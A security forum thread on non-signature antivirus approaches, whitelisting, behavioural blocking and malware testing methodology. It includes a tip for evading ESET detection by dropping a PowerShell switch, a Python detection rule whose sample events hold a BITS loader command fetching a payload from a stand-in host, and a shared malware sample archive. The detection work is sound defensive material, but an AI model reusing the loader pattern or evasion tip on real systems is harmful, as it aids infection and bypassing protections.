Advice Request Any real-time software that uses non-traditional ways to find malware?

ForgottenSeer 89360

If that were the case, then all mainstream products (besides MalwareBytes) would utilize deny-by-default instead of allow-by-default ;). Even BAFS is a simple 20 second sandbox analysis, which ultimately is a pre-analyzed blacklist.
Not all companies adore the deny-by-default that Comodo has advertised heavily again, ages ago. Every vendor has a different understanding and concept of how their product should behave. ESET and McAfee, for example, focus solely on accuracy, performance and false positive reduction in their home products.
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
> Unfortunately whitelisting won’t help against, to put it mildly, nasty documents with embedded OLEs and others. It also won’t protect against Java malware or any other malware that abuses trusted processes.
> These can be prevented with various behavioural blocker policies, but Java is an offender that typically gets overlooked.
>
> So if a user only downloads *.exe files, yes, they run only *known safe* files. If you broaden the scope of what a user downloads and works with, then no. Some files would be unknown.
I agree, currently WLC only detects .exe files, but that does not mean we cannot add other file types in the future. WLC is only about a year old and there are a lot of really cool things we can do with it. Give it time ;).
 

ChoiceVoice

Level 6
Verified
Oct 10, 2014
284
I'm not sure what non-traditional wouldn't really encompass, but suppose you are pointing to non-signature detection. That would leave behavioural detection, but behavioural detection isn't a new concept (I mean, ThreatFire/CyberHawk was for XPs). In truth, much of the hoopla and hype about AI learning detection is likely only behavioural detection with a new marketing angle. There does seem to be a newer form of behavioural detection, where they upload the file to a cloud sandbox and execute it, and then analyze it, but truth be told, this analysis is still just the old sigs and behavioural triggers of old, but performed in a safer environment. Most AVs have all these aspects integrated now and it is hard to find a dedicated behavioural detection program. Off the top of my head ... there is still WinPatrol WAR. It hasn't been updated for a while, but it isn't sig based, so it likely still has some merit for what you're after (?).

How about this: take daily system snapshots and compare them over a regular time frame. If you get infected, it will be visible and can be rolled back ... but what a cumbersome headache that would be, heheh.

Edit: yes, I see someone mentioned Comodo above. Execution control and user permissions can alert you to malware as well. So a good two-way firewall that asks you questions might be what you're looking for.
 
ForgottenSeer 89360

> I'm not sure what non-traditional wouldn't really encompass, but suppose you are pointing to non-signature detection. That would leave behavioural detection, but behavioural detection isn't a new concept (I mean, ThreatFire/CyberHawk was for XPs). In truth, much of the hoopla and hype about AI learning detection is likely only behavioural detection with a new marketing angle. There does seem to be a newer form of behavioural detection, where they upload the file to a cloud sandbox and execute it, and then analyze it, but truth be told, this analysis is still just the old sigs and behavioural triggers of old, but performed in a safer environment. Most AVs have all these aspects integrated now and it is hard to find a dedicated behavioural detection program. Off the top of my head ... there is still WinPatrol WAR. It hasn't been updated for a while, but it isn't sig based, so it likely still has some merit for what you're after (?).
>
> How about this: take daily system snapshots and compare them over a regular time frame. If you get infected, it will be visible and can be rolled back ... but what a cumbersome headache that would be, heheh.
Behavioural detection dates back to 2003 (Whole Security, later acquired by Symantec and the backbone of SONAR), and official documentation, which I have already pointed to in my ESET review, reveals that ESET has been using machine learning since 1995.
Cloud emulation/detonation has been around in various enterprise products for ages and Avast/AVG have been offering it for the past 5 years, if not more. So either way, nothing new 👍🏻👍🏻
 

danb

From VoodooShield
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,742
> I’m sorry, I don’t understand what you mean. In theory, pre-execution handling is always best. In practice, it’s not always possible with some products.
I am saying that the items you mentioned are not properly handled pre-execution when the security product is allow-by-default and the item is not determined to be malicious. In other words, pre-execution works best with deny-by-default.
 
ForgottenSeer 89360

> I am saying that the items you mentioned are not properly handled pre-execution when the security product is allow-by-default and the item is not determined to be malicious. In other words, pre-execution works best with deny-by-default.
The items I mentioned might not be handled by either deny-by-default or allow-by-default products; other approaches are needed there. For example, in my test with obfuscated PowerShell loaders (reputation is not applied to documents, bat and ps1 files) relying on BITS and a benign website, I saw that Kaspersky, ESET and QuickHeal were able to detect my malware using static heuristics.
ESET was easy to bypass by removing -windowstyle hidden and other attributes.

Avast/AVG and WiseVector were able to intercept the PowerShell invocation through CMD and the WMI calls. AVG were quick to blacklist the links I generated specially for the download (2-3 minutes after the behavioural blocker kicked in). Others, like Dr. Web, failed.

You can have a look at my thread “How well are you protected against Emotet” for more details.
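The defender's side of the test described above, as an added example that is not code from the thread or from any product named in it: a scoring rule over process-creation events that combines the parent process (cmd.exe launching PowerShell) with several command-line indicators (hidden window, skipped profile, BITS transfer, download and in-memory execution primitives), so that dropping a single switch such as -windowstyle hidden does not clear the alert. The event records, paths and the example.invalid URL are constructed; field names follow a Sysmon-style process-create event but are an assumption.

```python
import re

# Parents that should rarely launch PowerShell on a workstation
SUSPICIOUS_PARENTS = {"cmd.exe", "winword.exe", "excel.exe", "wscript.exe", "mshta.exe"}

# (pattern, weight, label). PowerShell accepts abbreviated switches, so the
# patterns accept the short forms too; no single indicator is decisive.
INDICATORS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-(nop|noprofile)\b", re.I), 1, "profile skipped"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 2, "encoded command"),
    (re.compile(r"Start-BitsTransfer|bitsadmin", re.I), 2, "BITS transfer"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 2, "web download"),
    (re.compile(r"\biex\b|Invoke-Expression", re.I), 2, "in-memory execution"),
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    if _basename(event["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    score, reasons = 0, []
    parent = _basename(event["parent_image"])
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append("spawned by " + parent)
    for pattern, weight, label in INDICATORS:
        if pattern.search(event["command_line"]):
            score += weight
            reasons.append(label)
    return score, reasons

def is_suspicious(event, threshold=4):
    """Alert only when enough weak indicators line up."""
    return score_event(event)[0] >= threshold

# Constructed events (not real telemetry): the loader shape from the post,
# the same loader with -w hidden stripped, and a benign scheduled backup.
EVENTS = [
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -nop -w hidden -c "Start-BitsTransfer -Source http://example.invalid/s2 -Destination $env:TEMP\s2.dat"'},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -nop -c "Start-BitsTransfer -Source http://example.invalid/s2 -Destination $env:TEMP\s2.dat"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
]
```

The second event loses one point when the hidden-window switch is removed but still crosses the threshold because the parent and the BITS download remain; a rule keyed on that one switch alone is the kind of check the post describes bypassing.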
 
danb

> The items I mentioned might not be handled by either deny-by-default or allow-by-default products; other approaches are needed there. For example, in my test with obfuscated PowerShell loaders (reputation is not applied to documents, bat and ps1 files) relying on BITS and a benign website, I saw that Kaspersky, ESET and QuickHeal were able to detect my malware using static heuristics.
> ESET was easy to bypass by removing -windowstyle hidden and other attributes.
>
> Avast/AVG and WiseVector were able to intercept the PowerShell invocation through CMD and the WMI calls. AVG were quick to blacklist the links I generated specially for the download (2-3 minutes after the behavioural blocker kicked in). Others, like Dr. Web, failed.
Call me crazy, but I personally believe that all vulnerable processes should be blocked when the user is browsing the web and checking email, especially when spawned from a web app.
 
ForgottenSeer 89360

> Call me crazy, but I personally believe that all vulnerable processes should be blocked when the user is browsing the web and checking email, especially when spawned from a web app.
There are various approaches to how this can be done, applied in various products (mainly enterprise). McAfee ENS features an extensive set of rules that can completely deactivate many vulnerable parts of the OS (to an extent where its critical components are not broken). AVG/Avast IDP contains many profiles and policies that reduce the attack surface without any intervention.
Defender ATP and even the home version might be tweaked to reduce the attack surface as well.
 

danb

> There are various approaches to how this can be done, applied in various products (mainly enterprise). McAfee ENS features an extensive set of rules that can completely deactivate many vulnerable parts of the OS (to an extent where its critical components are not broken). AVG/Avast IDP contains many profiles and policies that reduce the attack surface without any intervention.
> Defender ATP and even the home version might be tweaked to reduce the attack surface as well.
I am happy to see that someone else recognizes that critical components can be broken ;).

Here is some info on McAfee ENS, released in 2017. Certainly cool stuff they are working on...

"With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is."
I just find our approach a little easier, and if the user happens to allow something they should not, then McAfee would probably block it.

Fun conversation, but I have a lot to do, thank you!
 
ForgottenSeer 89360

> I am happy to see that someone else recognizes that critical components can be broken ;).
>
> Here is some info on McAfee ENS, released in 2017. Certainly cool stuff they are working on...
>
> "With the latest McAfee Endpoint Security, you don’t have to wait for a signature. If an executable has never been seen before, your endpoints automatically classify it as “greyware” and treat it with appropriate suspicion. Your endpoints first conduct pre-execution scanning of its code base—essentially a static look at the code (before it runs). Then, they perform dynamic analysis of the behavior during execution. All of these capabilities, and others, are part of protection at each endpoint that limits the damage and spread of greyware to other endpoints. And they’re designed and integrated to close that window of vulnerability—to stop malware even before security systems know exactly what it is."
>
> I just find our approach a little easier, and if the user happens to allow something they should not, then McAfee would probably block it.
>
> Fun conversation, but I have a lot to do, thank you!
They have a lot more than that.
Glad you enjoyed our conversation, have a great and productive week ahead!
 

danb

> @danb
> Thanks for your time and testing.
> 1) We also tested and ran all the samples you posted. The samples are old, and some of them are even more than 6 years old. Most of the samples missed by our static scanning are too old and cannot perform malicious actions because their C&C server has died. Only two of the samples had obvious malicious behavior. One of them deleted itself immediately after starting without further action; the other released a Trojan, which is blocked by our behavior detection. Anyway, we have added detection for the missed samples, thank you for sharing.
This obviously can also happen with dynamic analysis if a necessary dependency cannot be located and the sample fails to execute and exhibit malicious behaviors. So if a malware engine returns a not detected verdict for a file that was unable to execute based on dynamic analysis, this poses a serious issue when the malware is executed in the real world and the dependency is available, and the malware executes. In other words, both static and dynamic analysis are important, for different reasons, especially when it comes to building training data sets.

WV did very well and no one expects for any malware detection to be perfect... it never will be. Just look at all of the variation in the results that people posted on this thread.

BTW, I have a REALLY interesting malware pack that I am going to look for and if I can find it, post it somewhere on MT. It is probably 3-4 years old as well, but the results would be extremely interesting for all tested products.
 
ForgottenSeer 89360

Well, unfortunately, if we go and get a whole pack of malware, we won’t know if it has a dependency, a dead C&C server, or is just corrupt.
It’s a way of testing I personally don’t promote, but nevertheless, it is interesting to see.

My preferred type of test:
To conclude how good protection is, I test a product continuously for 14 days.
To perform the test I use samples and links collected from several sources, such as any.run, Hybrid Analysis, MalwareBazaar and others. I have several emails that have been breached and registered on not-so-trustworthy websites, so these receive a vast amount of phishing emails. I analyse relations on VirusTotal and discover more and more malware and links.

Every day the test includes:
  • 5 Phishing Links
  • 5 Malicious Links
  • 5 Malware Executables (*.exe files)
  • 5 Malicious Word/Excel Documents
  • 5 Scripts that abuse Windows processes
  • 5 Loaders that rely on PowerShell. I do not download these, but rather copy and paste the code into PowerShell.
  • Few Java malware files (*.jar)

I do not handpick links, but I specifically choose samples that are more difficult to detect (evasive, compressed, packed etc.). It's not necessary for these samples to be 0-days, but they should be prevalent.
The test has 2 outcomes: success (everything blocked) or failure (something has been missed).
A product must block everything to be successful.
It's not necessary for the malware sample to be deleted; for example, blocking a loader from downloading any additional files is good enough.
At the end I use HitmanPro, Norton Power Eraser and RogueKiller, as well as various utilities such as Process Explorer, to establish whether everything has been blocked (when a behavioural blocker has been involved).
In case of ransomware, products that support Secure Folders should keep the selected folders unencrypted.
I discard PUPs from the test, due to the fact that different vendors have a different understanding of what a PUP is. I consider misleading applications a form of malware.

As a last stage of the test I usually register a service, a scheduled task and auto-run pointing to a malware sample and containing malicious PowerShell code. I perform a scan and then check whether everything has been removed.

From time to time I can come up with other tests. These will be discussed in separate threads.
 
danb

> Well, unfortunately, if we go and get a whole pack of malware, we won’t know if it has a dependency, a dead C&C server, or is just corrupt.
> It’s a way of testing I personally don’t promote, but nevertheless, it is interesting to see.
>
> My preferred type of test:
Interesting... that is a great guide. Do you have a different procedure for deny-by-default products who may or may not have malware detection?

BTW, I found the extremely interesting sample set I was talking about. It is basically an efficacy benchmark that was created by a well-known security company to benchmark VoodooAi three or so years ago. It was intended to test VoodooAi for malware detection efficacy along with false positives. I do not necessarily believe that every sample is classified correctly, but according to the people who chose the samples, each sample was carefully classified 100% correctly, and I trust them, so it is probably a REALLY good benchmark for malware and false positive detection. The samples are 3 or so years old, but that should make zero difference for static ML/Ai analysis.

These files are quite obscure, so WLC should classify most of them as Not Safe (even the clean files). I tested a handful of samples with WLC and sure enough, all were classified as Not Safe. I also ran a static test with WV.

There are 4,317 samples that are divided into 3 category folders… 2,202 clean, 1,065 pup and 1,050 malware. The file is a 15 gig renamed .zip file with the standard password. I tried to upload the file to google drive but it was too big, so if anyone has any ideas where I can store that file please let me know. I could put it on one of our servers, but the last time I did that we ran into some issues. I know that is a large file, but this would be a SUPER interesting test to perform on all products, especially Next-Gen ML/Ai.
 
ForgottenSeer 89360

I found this:

I haven't come up with any other procedures at the moment.
Again, downloading a whole malware pack means we don't know what we are dealing with, so results will be fuzzy.
 
danb

Thank you for the suggestion, but the upload finished on google drive, here is a link...


As I was saying, the archive is a 15 gig renamed .zip file with the standard password.

It will be really interesting to see the results for various products, especially the static "Next-Gen" ML/Ai results, since that is what this sample set was specifically designed for. If you guys think it is a good idea to move this to a new thread, please do.
 

danb

> I found this:
>
> I haven't come up with any other procedures at the moment.
> Again, downloading a whole malware pack means we don't know what we are dealing with, so results will be fuzzy.
Results are always fuzzy and highly variable with malware analysis ;). Which is why it will never be perfect, or really even close to perfect.

I have not looked at this malpak in a while, but this is just not a random group of samples just thrown together. The samples were vetted and chosen for a very specific reason... to benchmark the efficacy of static ML/Ai analysis. Which is why I figured it would be such an interesting malpak... I am just happy I found it ;).
 
